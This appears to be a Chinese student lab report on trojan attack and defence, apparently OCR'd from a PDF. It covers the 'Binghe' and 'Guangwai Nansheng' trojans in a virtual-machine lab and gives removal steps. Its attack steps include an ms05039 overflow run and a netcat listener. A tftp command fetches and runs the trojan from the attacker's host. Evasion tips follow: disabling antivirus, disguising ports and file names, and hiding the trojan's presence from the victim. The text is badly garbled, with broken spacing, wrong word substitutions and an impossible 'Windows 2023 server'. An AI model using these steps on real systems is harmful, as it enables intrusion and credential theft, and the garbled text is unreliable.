2023年计算机网络安全实验报告.pdf

计算机网络安全实验报告实验序号：7实验项目名称：木马袭击与防范实验学号姓名专业、班实验地点实 1-411指导教师实验时间20 23-1 1-22一、实验目的及规定理解和掌握木马传播和运营的机制，掌握检查和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。二、实验设备（环境）及规定Windows 2 0 2 3 s e rv e r,虚拟机三、实验内容与环节实验任务一：“冰河”木马本实验需要把真实主机作为袭击机，虚拟机作为靶机。即一方面运用m s 0 5 0 3 9溢出工具入侵虚拟机，然后运用“冰河”木马实现对虚拟机的完全控制。最后对木马进行查杀。实验任务二：“广外男生”木马本实验将真实机作为袭击机，虚拟机作为靶机。真实机运用“广外男生”木马对虚拟机进行袭击，最终完全取得虚拟机的控制权。最后学习木马的查杀。四、实验结果与数据解决实验任务一：“冰河”木马环节1 ：入侵准备工作1）下载和安装木马软件前，关闭杀毒软件的自动防护功能,避免程序会被当作病毒而强行终止。2）运营G _ C L I E N T.E X E ;3）选择菜单“设立”-“配置服务程序”;4）设立访问口令为“1 2 3 4 5 6 7”，其它为默认值，点 击“拟定”生成木马的服务端程序G _ S E R VE R.E X E o5）将生成的木马服务程序G _ SE R VE R.E X E 拷贝到t ft p 服务的目录即C:攻防 t ft p 3 2。Ftftp文件（E）编辑 查 看 出 收 藏 工 具 帮 助 的j J后 退 .国|汽 搜 索 书 文 件 夹 恭 历 史|弗 喀地 址|2J tftp白；口 口 、G_SERVER Tftpd321tftp选定项目可以查看其说明。另话参阅：我的文档网上邻居我的电脑6）运营t ft p d3 2.ex e。保持此程序一直启动，用于等待袭击成功后传输木马服务程序。-Tftpd32 by Ph.Jounin-iDlxl当前目录|C:tftp 浏览|环节2：进行袭击，将木马放置在被袭击端1 ）对靶机P 3 进行袭击,一方面运营n c -v v -1 -p 9 9接着再开一个do s 窗口，运营m s 0 5 0 3 9 1 9 2.1 6 8.2 0.2 3 1 9 2.1 6 8.2 0.1 9 9 12）袭击成功后，在运营n c -v v -1 -p 9 9 的 do s 窗口中出现提醒，若袭击不成功请参照“缓冲区溢出袭击与防范实验”，再次进行袭击。3）在此窗口中运营t ft p -i 1 9 2.1 6 8.2 0.1 get g s er v er.e x e将木马服务程序G _ s e r v e r.ex e上传到靶机P 3 上,并直接输入g_ s er ve r .ex e使之运营。:IN D O S syste 32cxi.exe-nc-w -1 -p 99：Docum ents and S e tt in gs b a b ie.lucd C：fongf angC：Xgongfangnc uu 1 p 99lis te n in g on any 99.connect from COMMONOR-766C90 1 9 2.1 6 8.3.1 5 0 1032M icrosoft l/indows 2000 U ersion 5.0 0.2 1 9 5 1985-2000 M icrosoft Corp.C：W IN N T systen32tftp i 1 9 2.1 6 8.3.1 6 3 g et G _Server.exeC：g o n g fangnc uu 1 p 99lis te n in g on(anyJ 99.connect from COMMONOR-766C90 1 9 2.1 6 8.3.1 5 0 1035M icrosoft Windows 2000 CUersion 5.0 0.2 1 9 5 J 1985-2000 M icrosoft Corp.C：W IN N T systen32tftp i 1 9 2.1 6 8.3.1 6 3 g et G _Seruer.exet f t p -i 1 9 2.1 6 8.3.1 6 3 g et G _Seruer.exeT ransfer s u c c e s s fu l：266386 b y tes in 1 secon d,266386 b y te s/sC：WINNTsy ste n 3 2 G_Seruer.exeG _Seruer.exeC：W INNTsysten32确软济普译:_ _ _ _ _ _环节3：运营木马客户程序控制远程主机1 ）打开程序端程序,单击快捷工具栏中的“添加主机”按扭，如图8 所示。/“显示名称”：填入显示在主界面的名称“t a r g e t”/“主机地址”：填入服务器端主机的I P地 址“19 2.16 8.20.2 3”。/“访问口令”：填入每次访问主机的密码，这里输入“12 34 5 6 7”。/“监听端口”：“冰河”默认的监听端口是7 6 2 6,控制端可以修改它以绕过防火墙。单 击“拟定”按扭,即可以看到主机面上添加了主机。+我的电脑文件名称文 件 大 小 序 节)最 后 更 新 时 间t a r g e t口 C：+I D ocu m en ts and:(I n e tp u b:+l P rogram F i l e s田 口 RECYCLER 口 V ip ln foi+L J WINDOWS+SQ E3E3M D：M E：0F:口口口口口口口口口口口口口口口这 时 我 们 就 可 以 像 操 作 自 己 的 电 脑 同 样 操 作 远 程 目 的 电 脑，比如打开C:W I NNT s y s t e m 3 2 c o n f i g目录可以找到对方主机上保存用户口令的S A M文献。点击鼠标右键，可以发现有上传和下载功能。即可以随意将虚拟机器上的机密文献下载到本机上,也可以把恶意文献上传到该虚拟机上并运营。可见,其破坏性是巨大的。2)“文献管理器”使用。点击各个驱动器或者文献夹前面的展开符号,可以浏览目的主机内容。然后选中文献，在右键菜单中选中“下 载 文 献 至，在弹出的对话框中选好本地存储途径，点击“保存”。2”命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面,验证控制的各种命令。a.口令类命令：展开“口令类命令”，a.1 系统信息及口令”可以查看远程主机的系统信息，开机口令，缓存口令等。a.2“历史口令”可以查看远程主机以往使用的口令。a.3“击键记录”可以记录远程主机用户击键记录，以次可以分析出远程主机的各种帐号和口令或各种秘密信息。b.控制类命令：展开“控制类命令”，b.1 捕获屏幕”可以使控制端使用者查看远程主机的屏幕。b.2“发送信息”可以向远程计算机发送Wi n d ows标准的各种信息。b.3“进程管理”可以使控制者查看远程主机上所有的进程。单击“查看进程”按钮，就可以看到远程主机上存在的进程,甚至还可以终止某个进程，只要选中相应的进程，然后单击“终止进程”就可以了。b.4“窗口管理”可以使远程主机上的窗口进行刷新，最大化，最小化，激活，隐藏等。b.5“系统管理”可以使远程主机进行关机，重启，重新加载“冰河”，自动卸载“冰河”的操作。b.6“鼠标控制”可以使远程主机上的鼠标锁定在某个范围内。b.7“其他控制”可以使远程主机上进行自动拨号严禁，桌面隐藏，注册表锁定等操作。c 网络类命令展开“网络类命令”，c.1 “创建共享”在远程主机上创建自己的共享。c.2“删除共享”在远程主机上删除某个特定的共享。c.3“网络信息”可以看到远程主机上的I PC$,C$,ADM I N$等共享。d 文献类命令：展开“文献类命令，文献浏览”，“文献查找”，“文献压缩”，“文献删除”，“文献打开”等。e注册表读写：展 开“注册表读写”f 设立类命令：展 开“设立类命令”环节4：删 除“冰河”木马删 除“冰河”木马的方法：A.客户端的自动卸载功能，在“控制命令类”中 的“系统控制”里面就有自动卸载功能，执行这个功能，远程主机上的木马就自动卸载了。B.手动卸载,查看注册表，打开wi n d o ws 注册编辑器。令 打 开H K E Y _ L O C A L _ M A C H I N E S O F T W A R E M i c r o s o f t W i n d o ws C u rr en t V e r s i o n R u n如 图 1 6。在目录中发现了一个默认的键值C:W I N N T S y s t e m3 2 k e r n e l 3 2.ex e,这 就 是“冰河”木马在注册表中加入的键值，将它删除。打开H K E Y _ L 0 C A L _ M A C H I N E S O F T W A R E M i c ro s o f t W i n d o w s C u rre n t V e s i o n R u n s er v i c e s o 在目录中也发现了一个默认的键值C：W I N N T S y s t e m3 2 k e r n e1 3 2.e xe,这 也 是“冰河”在注册表中加入的键值，将它删除。上面两个注册表的子键目录R u n和 R u n s e r v i c e s 中存放的键值是系统启动时自启动的程序,一般病毒程序，木马程序，后门程序等都放在这些子键目录下，所以要经常检查这些目录下的程序。令 然后再进入C:W IN N T System 3 2 目录，找到“冰河”的两个可执行文献Kernel 3 2.exe和 Sys e xplr.e xe文献,将它们删除。|1 system 32!I x|文 件 编 辑()查 看 收 藏 工具(D 帮助J 后退回|搜 索 召 文 件 夹 1右3X英1理，地址（3|L-J system32二 夕 转 到选 定2个对象 520 KB 我的电脑文件夹X国 es.dllscesrv.dllS ias白 日 本 地 磁 盘(C:)士到 mpg4ds32.ax国 msvcrt20.dll囹odE Q j Documents and Settir回 rasmontr.dll同 h323.tspM qdE C J Program Files回 wow32.dll国 webcheck.dllS p e自 U i WINNT回 COMDLG32,DLL回 msh263.drv回MF；addins回 msjtes40,dll回 mstext40.dll同h2AppPatch回 cscui.dll回 WINSRV.DLL目vclE C_ assembly|b|qmgr.dll叵LOCALSPL.DLLW pn1 -l Config国 MSFLXGRD.OCX|1 sortkey,nls叵mv;i_ Connection WizarQ icm 32.dll回 QTPlugin.ocx|V|sm 1 Cursors国 localsec.dll回 MSDATGRD.OCX同W】国 U l Debug国 strmdll.dll闿 dxmrtp.dll国Px D o w n lo a d e d Inst1历J 2J修改文献关联也是木马常用的手段，“冰河”将t x t文献的缺省打开方式由notepad.e x e改为木马的启动程序，除此之外，h tml,e xe,z i p,com等都是木马的目的。所以，最后还需要恢复注册表中的t x t文献关联功能，只要将注册表中的HKEY_CLASSES_ROOTtxtf i le s h e llo p en c o mman d下的默认值,改为C:Win d o ws n otpad.e xe%1，即可。这样，再次重启计算机我们就完全删除了“冰河”木马。C.杀毒软件查杀大部分杀毒软件都有查杀木马的功能，可以通过这个功能对主机进行全面扫描来去除木马,就彻底把木马文献删除了。实验任务二：“广外男生”木马1）“广外男生”的连接运 营gwboy.exe,打 开“广外男生”的主程序，主界面。文I进日与胆翱iX4VdnEOOZhoHMU进行客户端设立。依次单击“设立”-“客户端设立”，弹出客户端设立界面如图21。我们可以看到它采用“反弹窗口+线程插入技术”的提醒。在“客户端最大连接数”中填入允许多少台客户端主机来控制服务器端，注意不要太多，否则容易导致服务器端主机死机。在“客户端使用端口”填入服务器端连接到客户端的那个端口，这是迷惑远程服务器端主机管理员和防火墙的关键，填入一些常用端口，会使远程主机管理员和防火墙误认为连接的是个合法的程序。比如使用端口 8 0（此例中，为避免端口冲突，我们 使 用1500端口）。选 择“只允许以上地址连接”选项，使客户端主机IP地址处在默认的合法控制I P地址池中。（2）设立木马的连接类型，假如使用反弹端口方式二则在弹出对话框中选中“使 用H TTP网页IP告知”；假如使用反弹端口方式一，则 选 择“客户处在静态I P（固定IP地址）此处我们选择后者。单 击“下一步”，和“完毕”，结束客户端设立。（4）进行服务器端设立。依次单击“设立”-“生成服务器端”，这时弹出“广外男生”服务器端生成向导，直 接 单 击“下一步”，弹出常规设立界面。在“EX E文献名”和“DLL文献名”中填入加载到远程主机系统目录下的可执行文献和动态链接库文献，在“注册表项目”中填入加载到远程主机注册表中的R un目录下的键值名。这些文献名都是相称重要的，由于这是迷惑远程主机管理员的关键所在，假如文献名起的非常隐蔽，如sysrem o t e.e x e,s y sr e mote.dl1 ,那么就算管理员发现了这些文献也不愿定这些文献就是木马而容易删除。注意：把“服务器端运营时显示运营标志并允许对方退出”前面的对勾去掉，否则服务器端主机的管理员就可以容易发现自己被控制了。(5)进行网络设立，如图2 4 选 择“静态I P”，在“客户端IP 地址”中填入入侵者的静态IP地址(即真实机IP),“客户端用端口”填入在客户端设立中选则的连接端口。(6)生成代理文献，在“目的文献”中填入所生成服务器端程序的存放位置，如 E:g wboy092A h acktest.e x e,这个文献就是需要植入远程主机的木马文献。单击“完毕”即可完毕服务器端程序的设立，这时就生成了一个文献名为hac ktest.exe的可执行文献，并将该文献拷贝到虚拟机桌面上(7)进行客户端与服务器连接。在虚拟机上执行木马程序hacktes t.exe,等待一段时间后客户端主机“广外男生”显示连接成功。这时，就可以和使用第2代木马“冰河”同样控制远程主机，重要的控制选项有“文献共享”，“远程注册表”,“进程与服务”，“远程桌面”等。ssH0BMU 3n.n:n二vr-sn-l文件值急*C X手动删除“广外男生”木马“广外男生”木马除了可以采用防病毒软件查杀之外,还可以通过手动方法删除，具体手动删除环节如下：(1)依次单击“开始”一“运营”，输 入 re g e d it进入注册表，依次展开到HKEY_LOC AL_MA C HINESOFTWAREM icrosoftWin d ows C ur r e nt Version Run,在里面找到木马自启动文献进行删除。(2)进 入 C:WINNT System 32,按文献大小进行排序，寻 找 11 6 k b 的文献。在这些文献中找到修改时间离现在比较近的，一般就是最近所添加的文献，将 gwboy.e xe文献删除。巧，学会防御木马的相关知识，加深对木马的安全防范意识。木马程序一般是由服务器端程序和客户端程序组成。在该次实验中，我成功入侵其他主机。使我对网络安全技术有了进一步的了解，这对以后的工作都是有相称大帮助的。六、教师评语署名：日期：成绩